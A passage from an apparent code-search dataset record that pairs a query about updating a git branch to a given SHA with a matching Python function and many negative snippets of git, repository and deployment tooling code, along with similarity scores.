\"\"\"+str(name)+\"\"\";\"\"\"+\"\"\"attributes = \"\"\"+str(attributes)+\"\"\";\"\"\"+\"\")\n try:\n CreateBackupTargetResult = ctx.element.create_backup_target(name=name, attributes=attributes)\n except common.ApiServerError as e:\n ctx.logger.error(e.message)\n exit()\n except BaseException as e:\n ctx.logger.error(e.__str__())\n exit()\n\n cli_utils.print_result(CreateBackupTargetResult, ctx.logger, as_json=ctx.json, depth=ctx.depth, filter_tree=ctx.filter_tree)", "def create_trunk(self, trunk_id, port_id, port_mac):\n trunk = TrunkParentPort(trunk_id, port_id, port_mac)\n try:\n if not trunk.bridge.exists():\n raise exc.TrunkBridgeNotFound(bridge=trunk.bridge.br_name)\n trunk.plug(self.br_int)\n except RuntimeError as e:\n raise TrunkManagerError(error=e)", "def addBranch(self, name, dtype='f', default=None, standard=True):\n if hasattr(self,name):\n print \"ERROR! TreeProducerCommon.addBranch: Branch of name '%s' already exists!\"%(name)\n exit(1)\n if isinstance(dtype,str):\n if dtype.lower()=='f': # 'f' is only a 'float32', and 'F' is a 'complex64', which do not work for filling float branches\n dtype = float # float is a 'float64' ('f8')\n elif dtype.lower()=='i': # 'i' is only a 'int32'\n dtype = int # int is a 'int64' ('i8')\n if standard:\n setattr(self,name,num.zeros(1,dtype=dtype))\n self.Branch(name, getattr(self,name), '%s/%s'%(name,root_dtype[dtype]))\n if default!=None:\n getattr(self,name)[0] = default\n else:\n l = array('f', [0.])\n setattr(self,name,TObjArray(l))\n # self.Branch(name, getattr(self, name))\n print type(getattr(self, name))\n self.Branch(getattr(self, name))", "def push(self, base_repo, branch=\"master\"):\n base_repo.push_to(self, branch)", "def create_ref(self, commit_id=None):\n pass", "def svn_fs_create_berkeley(*args):\r\n return _fs.svn_fs_create_berkeley(*args)", "def create(self):\n pass", "def create(self):\n pass", "def create(self):\n pass", "def __add_simple_branch(self, action, task_activities):\n action_activity_name = create_activity_name_from_action(action=action)\n add_activity_to_task(task_activities=task_activities, activity_name=action_activity_name, hide_activity=True)\n\n post_or_element, stop_pre_or_tag = self.__add_pre_or_and_post_or(action=action,\n action_activity_name=action_activity_name,\n task_activities=task_activities)\n\n for branch in action.findall(\"./branches_Branch\"):\n branches_steps = branch.find(\"./branchBehaviour_BranchTransition\").findall(\".//steps_Behaviour\")\n branch_start_actions, final_successor_action = self.__get_final_successor_and_start(actions=branches_steps)\n # Create ActionFactory and add action\n self.__create_actions_for_all_branches(branches_steps, task_activities)\n\n branch_conditions = branch.findall(\".//branchCondition_GuardedBranchTransition\")\n for condition in branch_conditions:\n condition_types = self.__get_condition_types(condition)\n reference_name = self.__get_reference_name(condition_types=condition_types)\n variable_usage = get_element_by_identifier(attribute=\"referenceName\", search_string=reference_name,\n element_tree=self.xml_cache.get_xml_tree(\"usagemodel\"))\n\n for branch_start_action in branch_start_actions:\n parent = variable_usage.getparent()\n bool_exp = parent.find(\".//specification_VariableCharacterisation\").get(\"specification\")\n match_object = re.findall(r'true;+\\d\\.\\d*|false;+\\d\\.\\d*', bool_exp)\n # Get branch probability for post element\n branch_probability = \"0\"\n # First start action has false probability\n if \"NOT\" in condition_types:\n for matching_object in match_object:\n if \"false\" in matching_object:\n branch_probability = matching_object.split(\";\")[1]\n else:\n for matching_object in match_object:\n if \"true\" in matching_object:\n branch_probability = matching_object.split(\";\")[1]\n\n post_predecessor_activity_name = create_activity_name_from_action(action=branch_start_action)\n post_predecessor_activity = SubElement(post_or_element, 'activity')\n post_predecessor_activity.set(\"name\", post_predecessor_activity_name)\n post_predecessor_activity.set(\"prob\", branch_probability)\n\n self.__add_stop_action_precedences(final_successor_action, stop_pre_or_tag)", "def firmware_pack_create(handle, org_name, name, rack_bundle_version,\n blade_bundle_version, descr=\"\", mode=\"staged\",\n org_parent=\"org-root\"):\n\n org_dn = org_parent + \"/org-\" + org_name\n p_mo = handle.query_dn(org_dn)\n if not p_mo:\n log.info(\"Sub-Org <%s> not found!\" % org_name)\n else:\n from ucsmsdk.mometa.firmware.FirmwareComputeHostPack import\\\n FirmwareComputeHostPack\n\n mo = FirmwareComputeHostPack(parent_mo_or_dn=org_dn,\n name=name,\n descr=descr,\n rack_bundle_version=rack_bundle_version,\n mode=mode,\n blade_bundle_version=blade_bundle_version)\n handle.add_mo(mo)\n handle.commit()", "def _switchBranch(self, release):\n if release is None:\n self.branch = None\n self.branch_dir = None\n log.info('No release branch available')\n else:\n self.wc.update()\n assert self.wc.exists('branches/' + release)\n io.linesToFile(self.path(self.BRANCH_FILE), [release])\n self.branch = release\n self.branch_dir = 'branches/' + release\n self.wc.update(self.branch_dir, depth='infinity')\n log.info('Working on branch ' + self.branch)", "def create(self):\n ...", "def create(self):\n\n raise NotImplementedError", "def checkout_branch(self, branchname, current_path):\n p = Popen(\n [\"git\", \"checkout\", branchname],\n stdout=PIPE,\n stderr=PIPE,\n cwd=os.path.join(self.root_dir, current_path),\n )\n my_output, my_error = p.communicate()\n if p.returncode == 0:\n return {\"code\": p.returncode, \"message\": my_output.decode(\"utf-8\")}\n else:\n return {\n \"code\": p.returncode,\n \"command\": \"git checkout \" + branchname,\n \"message\": my_error.decode(\"utf-8\"),\n }", "def create_stack(self, stack, template, parameters):\n self.cfn.create_stack(StackName=stack, TemplateBody=template, Parameters=parameters)\n waiter = self.cfn.get_waiter('stack_create_complete')\n waiter.wait(StackName=stack)" ]
[ "0.8263331", "0.77891356", "0.76186675", "0.72726834", "0.71636385", "0.7043409", "0.69660765", "0.6948939", "0.6918359", "0.6828066", "0.6820213", "0.6789778", "0.67066014", "0.660529", "0.66019213", "0.65866226", "0.6435828", "0.6376282", "0.62368584", "0.62368584", "0.6212842", "0.6053773", "0.60523766", "0.5988234", "0.5987599", "0.59790695", "0.5945354", "0.59414065", "0.5938403", "0.59379387", "0.5908007", "0.585037", "0.58284605", "0.58164334", "0.5800554", "0.57933253", "0.5790158", "0.5788148", "0.57708186", "0.57387066", "0.5707968", "0.5704753", "0.5655177", "0.56504893", "0.5620868", "0.5599651", "0.55568093", "0.5518143", "0.54830134", "0.5481074", "0.5477548", "0.54754263", "0.54537755", "0.54537755", "0.54406846", "0.5439406", "0.54245406", "0.54170126", "0.54108685", "0.5400375", "0.53946465", "0.53772515", "0.537645", "0.5370509", "0.5356602", "0.5352776", "0.5309672", "0.52978355", "0.5292055", "0.52798057", "0.52618307", "0.52587634", "0.5248471", "0.5234938", "0.52349156", "0.52248687", "0.51990026", "0.519074", "0.5174066", "0.51575243", "0.5152781", "0.5149605", "0.514363", "0.51392525", "0.51303333", "0.5126925", "0.5122555", "0.5119889", "0.51183736", "0.51168424", "0.51131445", "0.51131445", "0.51131445", "0.50965273", "0.50960267", "0.50928015", "0.50907534", "0.5079079", "0.5073764", "0.5072663" ]
0.6839864
9
Update attempt to update branch to the given SHA.
def update_branch(self, name, sha): branch_info = { 'sha': sha, } resp = self.patch('git/refs/heads/{}'.format(name), json=branch_info) try: resp.raise_for_status() except Exception: logger.error(resp.json()) raise return resp.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_latest_branch (product, which, main_branch):\n\n name = \"Latest_ACE7TAO3_\" + which\n\n vprint ('Fast-forwarding', name, 'to', main_branch)\n ex (\"cd $DOC_ROOT/\" + product + \" && git fetch . \" + main_branch + \":\" + name)", "def update(self, branch=None):\n if branch is None:\n branch = self.branch\n\n print \"*** Updating to branch '%s'\" % branch\n commands.pull(ui.ui(), self._repository, self.url)\n commands.update(ui.ui(), self._repository, None, branch, True)", "def update(self, rev = 'HEAD'):\r\n self._authsvn('up', ['-r', rev])", "def update(repository, args, **_):\n _log(repository, 'INFO', \"Going to build commit %s\" % args[2][:7])", "def reset_branch(ctx, name, sha, hard):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo(\"Updating {} branch...\".format(name), break_line=False)\n gh.reset_branch(name=name, sha=sha, hard=hard)\n log.echo('Branch {} is now at {} '.format(name, sha), break_line=False)\n log.checkmark()\n except BaseException as _:\n log.xmark()\n raise", "def update():\n call('git -C ~/norminette+ pull', shell=True)", "def verify_up_to_date(path, branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch up to date:\")\n run_in_component(path, ['git', 'remote', 'update'])\n\n result = run_in_component(path, ['git', 'rev-list', 'HEAD...origin/%s' % branch, '--count'])\n count = int(result.strip())\n\n if count == 0:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You branch is not up-to-date with remote branch: %d different commits\" % count)", "def update(context, user=get_local_user(), remote=False, instance=None, branch=BRANCH):\n no_stack = None\n no_compose = False\n\n command = f\"git checkout {branch} || git pull && git checkout {branch}\"\n run_command(context, user, remote, instance, no_stack, command, no_compose)\n\n command = \"git pull\"\n run_command(context, user, remote, instance, no_stack, command, no_compose)", "def update_stable(path, sha_list, origin):\n\n conn = sqlite3.connect(rebasedb)\n c = conn.cursor()\n\n cmd = ['git', '-C', path, 'log', '--no-merges', '--abbrev=12', '--oneline',\n '--reverse', sha_list]\n commits = subprocess.check_output(cmd, encoding='utf-8', errors='ignore')\n\n for commit in commits.splitlines():\n if commit != '':\n elem = commit.split(' ')[:1]\n sha = elem[0]\n c.execute(\"select sha from stable where sha is '%s'\" % sha)\n found = c.fetchall()\n if found == []:\n c.execute('INSERT INTO stable(sha, origin) VALUES (?, ?)', (\n sha,\n origin,\n ))\n\n conn.commit()\n conn.close()", "def update_from_repo():\n\treturn", "def update_base_branch(self):\n # Make sure base branch is up to date\n print(\"Checking out base branch '{}'...\".format(self.base_branch))\n self.git.checkout(self.base_branch)\n print('Updating base branch...')\n self.git.pull('--rebase')", "def sha(self, sha):\n\n self._sha = sha", "def update_version():\n version = os.environ.get('TRAVIS_COMMIT', None) or \\\n subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD'])\n version_file = path.join('slingsby', 'VERSION')\n with open(version_file, 'w') as fh:\n fh.write(version)", "def set_git_sha(context, sha):\n context.sha = sha", "def update_repo_cli(api_client, repo_id, branch, tag, path):\n id_from_param_or_path = (repo_id if repo_id is not None\n else ReposApi(api_client).get_repo_id(path))\n content = ReposApi(api_client).update(id_from_param_or_path, branch, tag)\n click.echo(pretty_format(content))", "def pull_nightly_version(spdir):\n nightly_version = _nightly_version(spdir)\n cmd = [\"git\", \"merge\", nightly_version]\n p = subprocess.run(cmd, check=True)", "def push_latest_branch (product, which, main_branch):\n\n name = \"Latest_ACE7TAO3_\" + which\n\n if opts.push:\n vprint (\"Pushing branch\", name)\n ex (\"cd $DOC_ROOT/\" + product + \" && git push origin refs/heads/\" + name,\n allow_fail=True)", "def update(dest, branch=None, revision=None):\n # If we have a revision, switch to that\n if revision is not None:\n cmd = ['hg', 'update', '-C', '-r', revision]\n run_cmd(cmd, cwd=dest)\n else:\n # Check & switch branch\n local_branch = get_output(['hg', 'branch'], cwd=dest).strip()\n\n cmd = ['hg', 'update', '-C']\n\n # If this is different, checkout the other branch\n if branch and branch != local_branch:\n cmd.append(branch)\n\n run_cmd(cmd, cwd=dest)\n return get_revision(dest)", "def checkout_nightly_version(branch, spdir):\n nightly_version = _nightly_version(spdir)\n cmd = [\"git\", \"checkout\", \"-b\", branch, nightly_version]\n p = subprocess.run(cmd, check=True)", "def update_branch(branch, repo, options):\n update = None\n\n remote = repo.get_merge_branch(branch)\n if not remote:\n gbp.log.warn(\"No branch tracking '%s' found - skipping.\" % branch)\n return False\n\n can_fast_forward, up_to_date = repo.is_fast_forward(branch, remote)\n\n if up_to_date: # Great, we're done\n gbp.log.info(\"Branch '%s' is already up to date.\" % branch)\n return True\n\n if can_fast_forward:\n update = 'merge'\n else:\n if options.force == 'merge':\n gbp.log.info(\"Non-fast forwarding '%s' due to --force=merge\" % branch)\n update = 'merge'\n elif options.force == 'clean':\n gbp.log.info(\"Checking out clean copy of '%s' due to --force=clean\" % branch)\n update = 'clean'\n else:\n gbp.log.warn(\"Skipping non-fast forward of '%s' - use --force or \"\n \"update manually\" % branch)\n\n if update:\n gbp.log.info(\"Updating '%s'\" % branch)\n if repo.branch == branch:\n if update == 'merge':\n repo.merge(remote)\n elif update == 'clean':\n # Have to drop our current branch\n tmpbranch = \"_gbptmp-\"+branch\n gbp.log.debug(\"Checking out '%s' to '%s'\" % (remote, tmpbranch))\n repo.create_branch(tmpbranch, remote)\n gbp.log.debug(\"Switching current branch to '%s'\" % (tmpbranch))\n repo.set_branch(tmpbranch)\n gbp.log.debug(\"Dropping branch '%s'\" % branch)\n repo.delete_branch(branch)\n gbp.log.info(\"Renaming branch '%s' to '%s'\" % (tmpbranch, branch))\n repo.rename_branch(tmpbranch, branch)\n else:\n if can_fast_forward or (update == 'clean'):\n sha1 = repo.rev_parse(remote)\n repo.update_ref(\"refs/heads/%s\" % branch, sha1,\n msg=\"gbp: forward %s to %s\" % (branch, remote))\n elif update == 'merge':\n # Merge other branch, if it cannot be fast-forwarded\n current_branch=repo.branch\n repo.set_branch(branch)\n repo.merge(remote)\n repo.set_branch(current_branch)\n\n return (update != None)", "def update_changelog(package_id: str, base_branch: str, verbose: bool):\n if _update_changelog(package_id, base_branch, verbose, True):\n sys.exit(64)", "def update_ref(ref, value):\n subprocess.check_call([\"git\", \"update-ref\", ref, value])", "def sha(location, rev):\n ensure_dir(location)\n with utils.cd(location):\n cmd = '/usr/bin/git rev-parse --verify {}'.format(rev)\n return subprocess.check_output(cmd, shell=True).strip()", "def bump_upstream_repos_shas(path):\n filelist = find_yaml_files(path)\n for filename in filelist:\n print(\"Working on %s\" % filename)\n bump_upstream_repos_sha_file(filename)", "def git_update(path: Path, repo: str, tag: str = None):\n GITEXE = shutil.which(\"git\")\n\n if not GITEXE:\n logging.error(\"Git not available.\")\n return\n\n if path.is_dir():\n subprocess.check_call([GITEXE, \"-C\", str(path), \"pull\"])\n else:\n # shallow clone\n if tag:\n subprocess.check_call(\n [\n GITEXE,\n \"clone\",\n repo,\n \"--depth\",\n \"1\",\n \"--branch\",\n tag,\n \"--single-branch\",\n str(path),\n ]\n )\n else:\n subprocess.check_call([GITEXE, \"clone\", repo, \"--depth\", \"1\", str(path)])", "def _update_head(self, index_entry, branch, new_id):\r\n index_entry['versions'][branch] = new_id\r\n self.db_connection.update_course_index(index_entry)", "def checkout_latest():\n with cd(env.repo_path):\n run('git checkout %(branch)s;' % env)\n run('git pull origin %(branch)s' % env)", "def commit(self, sha):\r\n return repocommits.RepoCommit(self, sha)", "def main(branch):\n try:\n # Ensure that we're in a git repository. This command is silent unless\n # you're not actually in a git repository, in which case, you receive a\n # \"Not a git repository\" error message.\n output = subprocess.check_output(['git', 'rev-parse']).decode('utf-8')\n sys.stdout.write(output)\n except subprocess.CalledProcessError:\n # Bail if we're not in a git repository.\n return\n\n # This behavior ensures a better user experience for those that aren't\n # intimately familiar with git.\n ensure_remote_branch_is_tracked(branch)\n\n # Switch to the specified branch and update it.\n subprocess.check_call(['git', 'checkout', '--quiet', branch])\n\n # Pulling is always safe here, because we never commit to this branch.\n subprocess.check_call(['git', 'pull', '--quiet'])\n\n # Checkout the top commit in the branch, effectively going \"untracked.\"\n subprocess.check_call(['git', 'checkout', '--quiet', '%s~0' % branch])\n\n # Clean up the repository of Python cruft. Because we've just switched\n # branches and compiled Python files should not be version controlled,\n # there are likely leftover compiled Python files sitting on disk which may\n # confuse some tools, such as sqlalchemy-migrate.\n subprocess.check_call(['find', '.', '-name', '\"*.pyc\"', '-delete'])\n\n # For the sake of user experience, give some familiar output.\n print('Your branch is up to date with branch \\'origin/%s\\'.' % branch)", "def bump_version(ctx, branch, semantic):\n\n try:\n log.echo('Bumping version...', break_line=False)\n bump = ctx.obj.github.bump_version(branch=branch, semantic=semantic)\n log.checkmark()\n log.echo('Bumped version from {} to {}'.format(bump.prev_version, bump.next_version))\n except BaseException as _:\n log.xmark()\n raise", "async def update(\n app: AppIdentity,\n repo: str,\n id: str,\n name: str,\n):\n repo = RepoName.parse(repo)\n\n action = checks.UpdateRun(\n owner=repo.owner,\n repo=repo.repo,\n run=checks.RunDetails(\n id=id,\n name=name,\n status=checks.Status.in_progress,\n ))\n\n async with aiohttp.ClientSession(\n headers=await app.installation_headers(repo.owner)) as sesh:\n\n async with action.execute(sesh) as resp:\n logging.debug(resp)\n\n try:\n resp.raise_for_status()\n except Exception:\n logging.exception((await resp.json())[\"message\"])\n raise\n\n print(await resp.json())", "def checkForUpdates(self):\n\t\t# Get a definite yes or no answer from the user.\n\t\tinput = \"\"\n\t\twhile input != \"y\" and input != \"yes\" and input != \"n\" and input != \"no\":\n\t\t\tprint(\" Download the latest version of hnsh? (y/n)\")\n\t\t\tinput = raw_input(\"> \")\n\t\t\n\t\tif input == \"y\" or input == \"yes\":\n\t\t\tprint \"\\n Downloading the latest version from GitHub repository...\"\n\t\t\tserverFile = urllib.urlretrieve(\"http://github.com/scottjacksonx/hnsh/zipball/master\", \"hnsh_latest.zip\", quickProgressBar)\n\t\t\tslash = \"/\"\n\t\t\tif sys.platform == \"win32\":\n\t\t\t\tslash = \"\\\\\"\n\t\t\tif os.path.isfile(\"hnsh_latest.zip\"):\n\t\t\t\tprint \"\"\n\t\t\t\tprint \" The latest version of hnsh has been downloaded as:\"\n\t\t\t\tprint \" \" + sys.path[0] + slash + \"hnsh_latest.zip.\"\n\t\t\t\tprint \"\"\n\t\t\t\tprint \" Would you like to apply the update? (y/n)\"\n\t\t\t\tif raw_input(\"> \") == (\"y\" or \"yes\" or \"Y\"):\n\t\t\t\t\tprint \"\\n> Attempting to apply update ...\"\n\t\t\t\t\tupdateZip = zipfile.ZipFile(sys.path[0] + slash + \"hnsh_latest.zip\", \"r\")\n\t\t\t\t\tfor name in updateZip.namelist():\n\t\t\t\t\t\tif (updateZip.getinfo(name).file_size > 0):\n\t\t\t\t\t\t\tupdateZip.extract(name)\n\t\t\t\t\t\t\tshutil.copy(sys.path[0] + slash + name, sys.path[0] + slash + (name.rpartition(\"/\")[2]))\n\t\t\t\t\t\t\tprint \" \", name, updateZip.getinfo(name).file_size, \"bytes\"\n\t\t\t\t\t\t\tos.remove(sys.path[0] + slash + name)\n\t\t\t\t\tos.remove(sys.path[0] + slash + \"hnsh_latest.zip\")\n\t\t\t\t\tos.rmdir(sys.path[0] + slash + name.rpartition(\"/\")[0])\n\t\t\t\telse:\n\t\t\t\t\tprint \"\\n> Download finished! Press enter to exit so you can manually update the files.\"\n\t\t\telse:\n\t\t\t\tprint \"Error trying to update automatically. To update manually, go to http://github.com/scottjacksonx/hnsh and download the latest version of hnsh.\"\n\t\t\tinput = raw_input(\"\\n> Done! Now press enter and re-run this program to use the new version.\")\n\t\t\tself.quit = 1\n\t\telse:\n\t\t\tinput = raw_input(\"Press Return to go back to stories.\")\n\t\t\tself.printStories()", "def check_fast_forward(self, branch):\n proc = run_cmd(self.git + ['rev-list', '%s-tmp..%s' %\n (branch, branch), '--'])\n if proc.stdout.strip():\n # Commits have been made on the main branch since the last update\n # command.\n raise EmtError('cannot fast-forward the %s branch, please '\n 'run again the update command' % branch)", "def update(self):\n resp = yield self.client.request(\n \"{}/pulls/{}\".format(self.repo.base_path, self.num),\n params={\n \"title\": self.title,\n \"body\": self.body,\n \"state\": self.state,\n \"base\": self.base,\n \"maintainer_can_modify\": self.maintainer_can_modify,\n }, method=\"PATCH\")\n self.c = resp.data\n self.after_sync()\n raise gen.Return(self)", "def update_mirror(self, repo, body):\n url = self._repo_url(repo, other='/mirror')\n response = self.rest.put(url)\n\n if response.status_code is not 200:\n self.module.fail_json(msg=response.info)\n return response.info", "def update(self, path):\n # pylint: disable=E1101\n # E1101: pylint could not resolve the depth attribute.\n \n self._sharedState.lock.acquire()\n try:\n try:\n self._client.cleanup(self.workingCopyPath)\n self._client.revert(self._workingCopyPath + path, True)\n self._client.update(self._workingCopyPath + path, depth=pysvn.depth.infinity )\n except ClientError, error:\n raise SubversionError(error)\n finally:\n self._sharedState.lock.release()", "def update_rc_branch(ctx, mainline, rc):\n repo = ctx.obj\n rc = try_context(repo, rc, \"rc\", \"rc_ref\")\n\n if mainline == rc:\n raise ValueError(\"Specifying the same branch for mainline and rc\"\n \" will result in dataloss. The mainline branch\"\n \" will be deleted, then the rc branch will be\"\n \" created from the now non-existent mainline branch\")\n\n branch_protection_enabled = False\n\n # check if branch exists\n if rc in (b.name for b in repo.iter_branches()):\n logging.debug(\"Branch {} exists\".format(rc))\n # rc branch exists\n branch_protection_response = branch_api_request(repo, rc, 'GET')\n if branch_protection_response.status_code == 200:\n # rc branch exists and protection enabled\n logging.debug(\"Branch {branch} has protection enabled,\"\n \" config: {bp_config}\"\n .format(branch=rc,\n bp_config=branch_protection_response.json()))\n branch_protection_enabled = True\n # disable branch protection\n r = branch_api_request(repo, rc, 'DELETE')\n r.raise_for_status()\n logging.debug(\"Branch protection disabled\")\n elif branch_protection_response.status_code == 404:\n # rc branch exists without protection, so it doesn't need\n # to be disabled\n # TODO: create jira issue about unprotected branch?\n pass\n else:\n # failure retrieving branch protection status\n branch_protection_response.raise_for_status()\n\n # Delete branch\n r = repo._session.request(\n 'DELETE',\n repo.git_refs_urlt.expand(sha=\"heads/{}\".format(rc)))\n r.raise_for_status()\n logging.debug(\"Branch {} deleted\".format(rc))\n\n mainline_sha = repo.branch(mainline).commit.sha\n logging.debug(\"Mainline SHA: {}\".format(mainline_sha))\n\n # create rc branch pointing at head of mainline\n repo.create_ref(\"refs/heads/{}\".format(rc), mainline_sha)\n logging.debug(\"Branch {} created\".format(rc))\n\n # Skeleton branch protection data, used to protect a new branch.\n protection_data = {\n \"required_status_checks\": None,\n \"enforce_admins\": True,\n \"required_pull_request_reviews\": {\n \"dismissal_restrictions\": {},\n \"dismiss_stale_reviews\": False,\n \"require_code_owner_reviews\": False\n },\n \"restrictions\": None\n }\n\n # Incorporate previous branch protection data if the branch was\n # protected perviously\n if branch_protection_enabled:\n stored_bpd = branch_protection_response.json()\n protection_data.update(stored_bpd)\n # The github api returns enforce_admins as dict, but requires it to\n # be sent as a bool.\n protection_data['enforce_admins'] \\\n = stored_bpd['enforce_admins']['enabled']\n\n # Enable branch protection\n r = branch_api_request(repo, rc, 'PUT',\n data=json.dumps(protection_data))\n r.raise_for_status()\n logging.debug(\"Branch Protection enabled for branch {}\".format(rc))\n\n # Ensure the rc branch was not updated to anything else while it was\n # unprotected. Stored mainline_sha is used incase mainline has\n # moved on since the SHA was acquired.\n assert mainline_sha == repo.branch(rc).commit.sha\n logging.debug(\"rc branch update complete\")", "def clone_or_update(self,\n repo_url: str,\n repo_dir: str,\n branch: str = \"\",\n depth: str = \"\"):\n if os.path.exists(repo_dir):\n return self.update(repo_dir, branch=branch)\n\n update_to_latest_tag = False\n if branch == \"latest_tag\":\n branch = \"\"\n update_to_latest_tag = True\n p = self.clone(repo_url, repo_dir, branch=branch, depth=depth)\n if not update_to_latest_tag:\n return p\n return self.update(repo_dir, branch=\"latest_tag\")", "def checkout(revision):\n subprocess.run(\n ['git', 'checkout', revision],\n check=True\n )", "def ensure_sync_master_branch(self):\n # TODO(robertocn): Investigate what causes the states mentioned in the\n # docstring in the first place.\n self.api.m.git('update-ref', 'refs/heads/master',\n 'refs/remotes/origin/master')\n self.api.m.git('checkout', 'master', cwd=self.api.m.path['checkout'])", "def _update_head(self, course_key, index_entry, branch, new_id):\n if not isinstance(new_id, ObjectId):\n raise TypeError(f'new_id must be an ObjectId, but is {new_id!r}')\n index_entry['versions'][branch] = new_id\n self.update_course_index(course_key, index_entry)", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def fetch(path):\n LOGGER.info('Post push request received, Updating %s', path)\n call(['cd \"' + path + '\" && git fetch'], shell=True)", "def pull(ctx, path_base):\n with ctx.cd(path_base):\n ctx.run('git reset --hard')\n ctx.run('git pull origin master')", "async def trigger_build(self, *, branch=None, message=None):", "def update(self, rev=None, clean=False, check=False, date=None):\n\n if clean and check:\n raise ValueError('clean and check cannot both be True')\n if rev is not None and date is not None:\n raise ValueError('you cannot specify both rev and date')\n\n rev = self._map_one_rev(rev)\n\n out = self._client.execute('update', r=rev, C=clean, c=check, d=date)\n\n return tuple([int(x) for x in self._UPDATE_RESULT_RE.findall(out)])", "def _stash_and_checkout(repo, version):\n repo.git.stash()\n repo.git.checkout(version)\n repo.git.clean(\"-df\")", "def updateBuildArea(self):\r\n\r\n self.initializeBuildArea()\r\n\r\n for obj in self.config[\"repos\"]:\r\n if \"branch\" in obj:\r\n self.gitCheckoutBranch(obj[\"path\"], obj[\"branch\"])\r\n elif \"rev\" in obj:\r\n self.gitCheckoutRevision(obj[\"path\"], obj[\"rev\"])", "def new_commits(repo, sha):\n from datetime import datetime\n\n dateformat = \"%a, %d %b %Y %H:%M:%S GMT\"\n release_commit = repo.get_commit(sha)\n since = datetime.strptime(release_commit.last_modified, dateformat)\n commits = repo.get_commits(since=since)\n if len(list(commits)) == 1:\n return False\n return reversed(list(commits)[:-1])", "def pull_changes():\n\n check_prompt = (\n not env.prompt or\n console.confirm(\n \"Switch to appropriate branch and pull changes from upstream?\",\n default=True,\n )\n )\n\n if check_prompt:\n with cd(env.repo_path):\n run(\"git checkout %s\" % env.branch)\n run(\"git pull\")", "def git_update(c):\n c.run('git submodule update --recursive --remote')", "def run(self):\n USER.info('%s: Checking For Updates', self.recipe.name)\n cur_hash = pakit.conf.IDB[self.recipe.name]['hash']\n if cur_hash == self.recipe.repo.src_hash:\n return\n\n try:\n self.save_old_install()\n InstallTask(self.recipe).run()\n USER.info('%s: Deleting Old Install', self.recipe.name)\n Command('rm -rf ' + self.back_dir).wait()\n except Exception as exc: # pylint: disable=broad-except\n logging.error(exc)\n self.restore_old_install()", "def check_for_update():\n\n # get most recent commit\n r = requests.get('https://api.github.com/repos/PokeMiners/game_masters/git/refs/heads/master')\n\n with open('forms.json', 'r') as f:\n forms = json.load(f)\n last_commit = forms['commit']\n\n # check if most recent commit is the same as the commit of the last downloaded game_master\n if r.status_code == 200:\n latest = json.loads(r.text)\n recent_commit = latest['object']['sha']\n if recent_commit == last_commit:\n return False\n\n print('New version of game_master found')\n r = requests.get('https://raw.githubusercontent.com/PokeMiners/game_masters/master/latest/latest.json')\n if r.status_code != 200:\n print('Couldn\\'t access latest game_master (did the url change?)', file=sys.stderr)\n return False\n \n # save new game_master\n game_master = json.loads(r.text)\n with open('game_master.json', 'w') as f:\n json.dump(game_master, f, indent=4)\n\n # store commit of current game_master\n with open('forms.json', 'w') as f:\n forms['commit'] = recent_commit\n json.dump(forms, f, indent=4)\n\n return True", "def pull(explicit=False):\n repo = git.repo()\n check_detached_head()\n saved_current_branch = repo.current_branch()\n\n commit()\n remote = remote_branch() \n\n # fetch. Dont use pull because we anyway have to local branches two deal\n # with: free and nice\n repo.fetch()\n\n # merge (updated) remote branch into free branch\n free = free_branch() \n if free:\n repo.checkout(free)\n repo.merge(remote)\n\n # rebase nice branch onto (updated) remote branch\n # todo: what if the above pull fails? Then the nice_branch is not rebased which leads to troubles later\n # todo: should be done automatically within pull if nice-branch is setuped correctly\n nice = nice_branch() \n if nice:\n repo.checkout(nice)\n repo.rebase(remote)\n\n if explicit:\n repo.checkout(saved_current_branch)", "def pull(self, source=None, update=False, force=False, rev=None,\n bookmark=None, branch=None, ssh=None, remotecmd=None,\n insecure=False, rebase=False, tool=None):\n\n # Normalise the input\n if isinstance(source, Repository):\n source = source.path\n\n rev = self._map_revs(rev)\n \n eh = SimpleErrorHandler()\n out = self._client.execute('pull', source, r=rev, u=update, f=force,\n B=bookmark, b=branch, e=ssh,\n remotecmd=remotecmd,\n insecure=insecure, rebase=rebase, t=tool,\n eh=eh)\n\n if update:\n return tuple([int(x) for x in self._UPDATE_RESULT_RE.findall(out)])\n \n return bool(eh)", "def set_branch(self, value):\n self.update(value)", "def update_commits():\n\n conn = sqlite3.connect(rebasedb)\n c = conn.cursor()\n\n cmd = ['git', '-C', chromeos_path, 'log', '--no-merges', '--abbrev=12',\n '--reverse', '--format=%at%x01%ct%x01%h%x01%an%x01%ae%x01%s',\n rebase_baseline() + '..']\n commits = subprocess.check_output(cmd, encoding='utf-8', errors='ignore')\n\n prevdate = 0\n mprevdate = 0\n for commit in commits.splitlines(): # pylint: disable=too-many-nested-blocks\n if commit != '':\n elem = commit.split('\\001', 5)\n authored = elem[0]\n committed = elem[1]\n sha = elem[2]\n contact = elem[3]\n email = elem[4]\n\n if ('@google.com' not 